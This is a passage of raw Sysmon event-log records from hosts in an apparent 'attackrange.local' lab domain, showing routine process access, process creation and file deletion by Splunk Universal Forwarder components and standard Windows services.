Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055036Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.238{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F892-60EB-007E-00000000CF01}8044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055035Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.238{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055034Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:50.238{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055033Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.238{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055032Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:50.238{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055031Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.238{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F892-60EB-007E-00000000CF01}8044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055030Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.238{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F892-60EB-007E-00000000CF01}8044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055029Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.218{466BC892-F892-60EB-007E-00000000CF01}8044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001055058Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:51.879{466BC892-F893-60EB-027E-00000000CF01}6792220C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055057Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:51.603{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F893-60EB-027E-00000000CF01}6792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055056Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:51.603{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F893-60EB-027E-00000000CF01}6792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055055Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:51.603{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055054Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:51.603{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055053Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:51.603{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055052Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:51.603{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055051Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:51.603{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F893-60EB-027E-00000000CF01}6792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055050Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:51.587{466BC892-F893-60EB-027E-00000000CF01}6792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
23542300x80000000000000001055049Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:51.586{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=693B8637CA3A353CB06FA4035AEBB6A5,SHA256=4C08286EE2B7D116B016AD740AD765B618B515F50B60B7D72EF632A06D9284CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810584Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:51.454{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6F21ADC6DC945B62D8C30ACECD8B03E,SHA256=9B8534332D6B2C445620BC450CF8470E4824635D981765A2AD0D88CA6EBFD895,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055048Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:51.217{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A567713657AF0B0A919EC06108EDA5D,SHA256=792332DE3602134B0BB7FA27FE724EE2A27CD0E9E44AE03BAE553D30EE5F6F13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055047Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:51.217{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=13E395662AC38D5F2BBFF4052E6F5637,SHA256=873B58CF9BFF2A380641A50CD4C1F3B0A4700F6606E382B6319D4D27BB41BF5F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055076Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.987{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F894-60EB-047E-00000000CF01}8412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055075Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.969{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055074Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:52.969{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055073Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.969{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055072Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:52.969{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055071Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.969{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F894-60EB-047E-00000000CF01}8412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055070Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.969{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F894-60EB-047E-00000000CF01}8412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055069Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.970{466BC892-F894-60EB-047E-00000000CF01}8412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055068Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.623{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29C8587E45DF70F844B95097A2FD9874,SHA256=3CF05329A7C28862D241117FEF9DD4D8A67525DDF6DC6DC70DEEEF8B55052DFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055067Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
